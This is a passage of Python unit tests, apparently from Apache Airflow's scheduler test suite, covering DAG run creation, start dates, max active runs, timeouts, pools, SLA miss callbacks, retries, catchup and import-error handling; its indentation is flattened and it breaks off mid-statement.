def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGs have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
executor=self.null_exec,
subdir=dag.fileloc,
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
self.assertListEqual([], self.null_exec.sorted_tasks)
# previously, running this backfill would kick off the scheduler because it
# would take the most recent run and start from there. That behavior still
# exists, but now it will only do so if the run is after the start date
bf_exec = TestExecutor()
backfill = BackfillJob(
executor=bf_exec,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
self.assertListEqual(
[
((dag.dag_id, 'dummy', DEFAULT_DATE, 1), State.SUCCESS),
],
bf_exec.sorted_tasks
)
session.commit()
scheduler = SchedulerJob(dag_id,
executor=self.null_exec,
subdir=dag.fileloc,
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
self.assertListEqual([], self.null_exec.sorted_tasks)
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
executor=self.null_exec,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
executor=self.null_exec,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
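# With schedule_interval='@once' only a single dag run should ever be
# created; a second create_dag_run call must return None.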
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
mock_list.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
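# For each parameterized state the task instance is expected to be
# picked up again, so _process_task_instances should append its key
# to the list below.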
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.put.assert_not_called()
def test_scheduler_do_not_schedule_without_tasks(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_without_tasks',
start_date=DEFAULT_DATE)
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear(session=session)
dag.start_date = None
dr = scheduler.create_dag_run(dag, session=session)
self.assertIsNone(dr)
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
mock_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=mock_list)
mock_list.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
task_instances_list = Mock()
scheduler._process_task_instances(dag, task_instances_list=task_instances_list)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_active_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test that a dagrun will be set to failed if it exceeds dagrun_timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test that a dagrun will not be scheduled if max_active_runs
has been reached and dagrun_timeout has not been reached.
Test that a dagrun will be scheduled if max_active_runs has
been reached but dagrun_timeout has also been reached.
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as the DagRun has not timed out and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
task_instances_list = Mock()
# and schedule them in, so we can check how many
# tasks are put on the task_instances_list (should be one, not 3)
scheduler._process_task_instances(dag, task_instances_list=task_instances_list)
task_instances_list.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob(executor=self.null_exec)
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
task_instances_list = []
scheduler._process_task_instances(dag, task_instances_list=task_instances_list)
self.assertEqual(len(task_instances_list), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in task_instances_list:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
self.assertEqual(len(scheduler.executor.queued_tasks), 0, "Check test pre-condition")
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED, State.UP_FOR_RETRY),
session=session)
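# The pool has only one slot, so only one of the two SCHEDULED task
# instances should end up queued on the executor.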
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
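# The start_date 2016-01-01 10:10 does not coincide with the '4 5 * * *'
# schedule, so the first execution_date is aligned to the next schedule
# point, 2016-01-02 05:04.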
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
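# Here the start_date coincides with the '10 10 * * *' schedule, so the
# first execution_date equals the start_date.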
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor(do_update=False)
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
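# do_schedule runs a single scheduler loop with DagBag mocked out so
# that only the DAG bagged above is scheduled.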
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler calls the sla miss callback
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta()})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
def test_scheduler_sla_miss_callback_invalid_sla(self):
"""
Test that the scheduler does not call the sla miss callback when
given an invalid sla
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
# Pass anything besides a timedelta object to the sla argument.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': None})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_sent_notification(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks that the scheduler does not put a task in limbo when the task
is retried but is still present in the executor.
"""
executor = TestExecutor(do_update=False)
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
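# Fail the queued task once so it moves to UP_FOR_RETRY, then force it
# back to SCHEDULED and verify the scheduler keeps the incremented
# try_number while the executor still holds the task.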
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# We no longer assert State.SCHEDULED here, because the scheduler
# may move the state from SCHEDULED to QUEUED.
# Once the executor queue is cleared the task should be allowed to
# re-queue; tasks that stay in executor.queued_tasks after
# executor.heartbeat() will be set back to the SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertIn(ti.state, [State.RUNNING, State.SUCCESS])
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG calling sys.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER, "..", "dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
executor=self.null_exec,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
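# Exactly one import error should have been recorded for the
# unparseable file, with the syntax error reported at line 1.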
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
